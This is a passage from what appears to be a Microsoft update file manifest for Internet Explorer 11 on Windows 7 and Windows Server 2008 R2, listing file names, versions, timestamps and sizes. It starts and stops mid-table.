\nJscript9.dll.mui| 11.0.9600.19963| 29,696| 14-Feb-21| 0:45 \nJscript9.dll.mui| 11.0.9600.19963| 34,816| 14-Feb-21| 0:46 \nJscript9.dll.mui| 11.0.9600.19963| 33,280| 14-Feb-21| 0:47 \nJscript9.dll.mui| 11.0.9600.19963| 32,256| 14-Feb-21| 0:47 \nJscript9.dll.mui| 11.0.9600.19963| 29,696| 14-Feb-21| 0:48 \nJscript9.dll.mui| 11.0.9600.19963| 32,768| 14-Feb-21| 0:49 \nJscript9.dll.mui| 11.0.9600.19963| 29,696| 14-Feb-21| 0:50 \nJscript9.dll.mui| 11.0.9600.19963| 30,720| 14-Feb-21| 0:51 \nJscript9.dll.mui| 11.0.9600.19963| 29,696| 14-Feb-21| 0:51 \nJscript9.dll.mui| 11.0.9600.19963| 16,384| 14-Feb-21| 0:52 \nJscript9.dll.mui| 11.0.9600.19963| 16,896| 14-Feb-21| 0:53 \nJscript9.dll.mui| 11.0.9600.19963| 16,896| 14-Feb-21| 0:54 \n \n### **Windows 7 and Windows Server 2008 R2**\n\n### \n\n__\n\nInternet Explorer 11 on all supported x86-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nurlmon.dll| 11.0.9600.19963| 12-Feb-2021| 17:50| 1,343,488 \niexplore.exe| 11.0.9600.19963| 13-Feb-2021| 11:46| 810,376 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:47| 31,744 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:48| 36,352 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 35,328 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 36,864 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 39,424 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 32,768 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:52| 37,376 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 33,280 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 38,400 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 30,720 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 35,328 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 36,864 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 25,600 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 24,576 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 35,840 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 34,304 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 34,304 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 36,352 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 35,840 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 35,840 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 35,840 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 34,304 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 35,840 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 33,280 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 34,304 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 34,304 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 20,992 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 21,504 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 21,504 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:47| 46,592 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:48| 52,736 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 51,200 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 51,200 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 56,320 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 57,856 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 49,664 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 54,272 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 47,616 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 49,152 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 55,296 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 45,056 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 51,712 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 51,712 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 53,248 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 39,424 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 35,840 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 50,176 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 51,200 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 50,688 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 52,736 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 53,760 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 54,272 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 54,272 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 52,736 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 51,200 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:08| 53,248 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 52,736 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 51,712 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 50,688 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 50,688 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 50,176 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 50,176 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 30,720 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 30,720 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 30,720 \ninetcpl.cpl| 11.0.9600.19963| 12-Feb-2021| 18:12| 2,058,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:47| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:48| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:52| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 10,752 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:47| 307,200 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:48| 293,888 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 290,304 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 289,280 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 299,008 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 303,104 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 282,112 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:52| 296,960 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 283,648 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 291,840 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 299,520 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 275,968 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 290,816 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 293,376 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 296,960 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 258,048 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 256,512 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 289,280 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 288,256 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 285,184 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 295,424 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 297,472 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 292,864 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 295,424 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 294,400 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 294,400 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:08| 292,864 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 290,816 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 288,768 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 286,208 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 281,600 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 286,720 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 292,352 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 242,176 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 243,200 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:16| 243,200 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:47| 61,440 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:48| 73,728 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 67,584 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 67,584 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 74,240 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 78,848 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 61,440 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:52| 74,752 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 62,464 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 68,096 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 75,264 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 61,440 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 68,608 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 72,192 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 73,216 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 41,472 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 37,888 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 68,608 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 67,584 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 65,536 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 74,240 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 70,656 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 71,168 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 71,680 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 71,168 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 69,632 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 68,096 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 68,608 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 68,096 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 65,536 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 59,904 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 65,536 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 69,120 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 29,696 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 30,720 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 30,720 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:25| 60,416 \nDiagnosticsHub.ScriptedSandboxPlugin.dll| 11.0.9600.19963| 12-Feb-2021| 18:26| 230,912 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:47| 46,080 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:48| 50,176 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 48,640 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 49,664 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 51,712 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 54,272 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 48,128 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:52| 50,176 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 47,616 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 49,152 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 50,688 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 45,056 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 49,152 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 49,152 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 49,664 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 39,936 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 39,424 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 47,616 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 47,616 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 51,200 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 50,688 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 49,664 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 50,176 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 49,152 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 48,640 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:08| 50,176 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 48,640 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 49,664 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 48,640 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 48,128 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 49,152 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 48,128 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 35,328 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 35,328 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:16| 35,328 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:47| 9,728 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:48| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 9,728 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:52| 11,264 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 9,728 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:52| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 9,216 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 7,680 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 7,680 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 9,728 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:08| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 9,728 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 9,728 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 6,656 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 6,656 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:16| 6,656 \nwininet.dll| 11.0.9600.19963| 12-Feb-2021| 17:53| 4,388,352 \njsproxy.dll| 11.0.9600.19963| 12-Feb-2021| 18:41| 47,104 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:47| 114,176 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:48| 130,560 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 124,928 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 122,880 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 130,048 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 138,240 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 114,688 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:52| 131,584 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 117,760 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 122,368 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 134,144 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 107,008 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 123,392 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 127,488 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 128,512 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 88,576 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 82,944 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 125,440 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 123,392 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 120,320 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 130,560 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 129,024 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 125,952 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 129,024 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 128,000 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 123,904 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:08| 129,024 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 123,904 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 124,416 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 121,856 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 115,712 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 123,904 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 125,440 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 72,704 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 73,728 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:16| 73,728 \niedkcs32.dll| 18.0.9600.19963| 13-Feb-2021| 11:46| 341,896 \ninstall.ins| Not versioned| 12-Feb-2021| 16:25| 464 \nieapfltr.dat| 10.0.9301.0| 23-Sep-2018| 6:18| 616,104 \nieapfltr.dll| 11.0.9600.19963| 12-Feb-2021| 17:48| 710,656 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:24| 73,728 \nDiagnosticsHub.DataWarehouse.dll| 11.0.9600.19963| 12-Feb-2021| 18:50| 489,472 \niedvtool.dll| 11.0.9600.19963| 12-Feb-2021| 18:59| 772,608 \nDiagnosticsHub_is.dll| 11.0.9600.19963| 12-Feb-2021| 18:52| 38,912 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:29| 415,744 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 280,064 \nMicrosoft-Windows-IE-F12-Provider.ptxml| Not versioned| 12-Feb-2021| 16:23| 11,892 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:47| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:48| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:52| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 3,584 \nF12.dll.mui| 11.0.9600.19963| 